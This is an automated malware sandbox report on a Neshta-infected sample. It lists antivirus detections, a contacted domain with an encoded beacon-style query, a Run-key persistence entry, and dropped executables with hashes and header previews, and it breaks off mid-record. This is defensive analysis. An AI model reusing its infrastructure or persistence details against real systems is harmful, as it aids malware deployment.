          2.2.vi0EwpbUht.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          17.2.NETSTAT.EXE.292ed78.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.svchost.com.400000.0.unpack100%AviraW32/Neshta.ADownload File
          3.1.vi0EwpbUht.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.elxhan.exe.22b0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.vi0EwpbUht.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.elxhan.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.elxhan.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          17.2.NETSTAT.EXE.328f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.0.vi0EwpbUht.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.0.vi0EwpbUht.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.vi0EwpbUht.exe.2ff0000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.svchost.com.400000.0.unpack100%AviraW32/Neshta.ADownload File
          6.0.elxhan.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.vi0EwpbUht.exe.30e0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.vi0EwpbUht.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
          7.0.elxhan.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          4.0.explorer.exe.1183f834.74.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ==0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.personalizedyardsigns.com/xkcp/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          agileintelligence.coach
          		34.102.136.180
          		truefalse
            		unknown
            www.agileintelligence.coach
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ==false
              • Avira URL Cloud: safe
              		unknown
              www.personalizedyardsigns.com/xkcp/true
              • Avira URL Cloud: safe
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorErrorvi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_Errorvi0EwpbUht.exe, vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fonts.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        34.102.136.180
                                        		agileintelligence.coachUnited States
                                        		15169GOOGLEUSfalse

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:432848
                                        Start date:10.06.2021
                                        Start time:20:52:17
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 15m 8s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:vi0EwpbUht (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:24
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.spre.troj.evad.winEXE@15/122@1/1
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 40% (good quality ratio 37.6%)
                                        • Quality average: 75.5%
                                        • Quality standard deviation: 29.6%
                                        HCA Information:
                                        • Successful, ratio: 88%
                                        • Number of executed functions: 248
                                        • Number of non-executed functions: 257
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 20.50.102.62, 93.184.221.240, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.54.104.15, 20.54.7.98, 20.54.26.129, 23.57.80.111
                                        • Excluded domains from analysis (whitelisted): a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/432848/sample/vi0EwpbUht.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        20:53:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                        20:53:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                        20:53:20API Interceptor1x Sleep call for process: elxhan.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exevOR0HQg11L.exeGet hashmaliciousBrowse
                                          svchost.exeGet hashmaliciousBrowse
                                            svchost.exeGet hashmaliciousBrowse
                                              2018cf61_by_Libranalysis.exeGet hashmaliciousBrowse
                                                41cDVt18DA.exeGet hashmaliciousBrowse
                                                  FgTUClgDjQ.exeGet hashmaliciousBrowse
                                                    ORDER-021406_pdf.jarGet hashmaliciousBrowse
                                                      TT-INVI000000000.exeGet hashmaliciousBrowse
                                                        explorer.exeGet hashmaliciousBrowse
                                                          ITEMS_LIST.exeGet hashmaliciousBrowse
                                                            DB0127718.exeGet hashmaliciousBrowse
                                                              Itinerary.pdf.exeGet hashmaliciousBrowse
                                                                Neshta virus.exeGet hashmaliciousBrowse
                                                                  54nwZp1aPg.exeGet hashmaliciousBrowse
                                                                    qpFvMReV7S.exeGet hashmaliciousBrowse
                                                                      M7oBhU5A6m.exeGet hashmaliciousBrowse
                                                                        nqVQ8G1ylC.exeGet hashmaliciousBrowse
                                                                          mtsendmail.exeGet hashmaliciousBrowse
                                                                            mtloganalyser.exeGet hashmaliciousBrowse
                                                                              contig.exeGet hashmaliciousBrowse
                                                                                C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exevOR0HQg11L.exeGet hashmaliciousBrowse
                                                                                  svchost.exeGet hashmaliciousBrowse
                                                                                    svchost.exeGet hashmaliciousBrowse
                                                                                      2018cf61_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                        41cDVt18DA.exeGet hashmaliciousBrowse
                                                                                          FgTUClgDjQ.exeGet hashmaliciousBrowse
                                                                                            ORDER-021406_pdf.jarGet hashmaliciousBrowse
                                                                                              TT-INVI000000000.exeGet hashmaliciousBrowse
                                                                                                explorer.exeGet hashmaliciousBrowse
                                                                                                  ITEMS_LIST.exeGet hashmaliciousBrowse
                                                                                                    DB0127718.exeGet hashmaliciousBrowse
                                                                                                      Itinerary.pdf.exeGet hashmaliciousBrowse
                                                                                                        Neshta virus.exeGet hashmaliciousBrowse
                                                                                                          54nwZp1aPg.exeGet hashmaliciousBrowse
                                                                                                            qpFvMReV7S.exeGet hashmaliciousBrowse
                                                                                                              M7oBhU5A6m.exeGet hashmaliciousBrowse
                                                                                                                nqVQ8G1ylC.exeGet hashmaliciousBrowse
                                                                                                                  mtsendmail.exeGet hashmaliciousBrowse
                                                                                                                    mtloganalyser.exeGet hashmaliciousBrowse
                                                                                                                      contig.exeGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278258254187173
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
                                                                                                                        MD5:E47F8A2ECDC2D4BFBBB6328B1391F1CC
                                                                                                                        SHA1:A633C3106A89C083014FC9F29D559B70E93D6D69
                                                                                                                        SHA-256:8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                                                                                                                        SHA-512:6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: vOR0HQg11L.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 41cDVt18DA.exe, Detection: malicious, Browse
                                                                                                                        • Filename: FgTUClgDjQ.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ORDER-021406_pdf.jar, Detection: malicious, Browse
                                                                                                                        • Filename: TT-INVI000000000.exe, Detection: malicious, Browse
                                                                                                                        • Filename: explorer.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ITEMS_LIST.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DB0127718.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Itinerary.pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Neshta virus.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 54nwZp1aPg.exe, Detection: malicious, Browse
                                                                                                                        • Filename: qpFvMReV7S.exe, Detection: malicious, Browse
                                                                                                                        • Filename: M7oBhU5A6m.exe, Detection: malicious, Browse
                                                                                                                        • Filename: nqVQ8G1ylC.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtsendmail.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtloganalyser.exe, Detection: malicious, Browse
                                                                                                                        • Filename: contig.exe, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3372362912074625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
                                                                                                                        MD5:10075707D5C79CDACFE09DEF9C6D4985
                                                                                                                        SHA1:7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
                                                                                                                        SHA-256:3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
                                                                                                                        SHA-512:C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: vOR0HQg11L.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 41cDVt18DA.exe, Detection: malicious, Browse
                                                                                                                        • Filename: FgTUClgDjQ.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ORDER-021406_pdf.jar, Detection: malicious, Browse
                                                                                                                        • Filename: TT-INVI000000000.exe, Detection: malicious, Browse
                                                                                                                        • Filename: explorer.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ITEMS_LIST.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DB0127718.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Itinerary.pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Neshta virus.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 54nwZp1aPg.exe, Detection: malicious, Browse
                                                                                                                        • Filename: qpFvMReV7S.exe, Detection: malicious, Browse
                                                                                                                        • Filename: M7oBhU5A6m.exe, Detection: malicious, Browse
                                                                                                                        • Filename: nqVQ8G1ylC.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtsendmail.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtloganalyser.exe, Detection: malicious, Browse
                                                                                                                        • Filename: contig.exe, Detection: malicious, Browse
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.220006974675465
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
                                                                                                                        MD5:F447C4B446D5889225A9D9082145AD88
                                                                                                                        SHA1:A1A380F3D3402F243E1A213C39E969D2C24CA99E
                                                                                                                        SHA-256:C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
                                                                                                                        SHA-512:E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.356945716242827
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
                                                                                                                        MD5:DE64003856A8B74AEAF33E247AF9424B
                                                                                                                        SHA1:912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
                                                                                                                        SHA-256:A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
                                                                                                                        SHA-512:4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.486359083061706
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
                                                                                                                        MD5:D972E8BC4F221D69D9DF89999B74C311
                                                                                                                        SHA1:3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
                                                                                                                        SHA-256:8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
                                                                                                                        SHA-512:DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
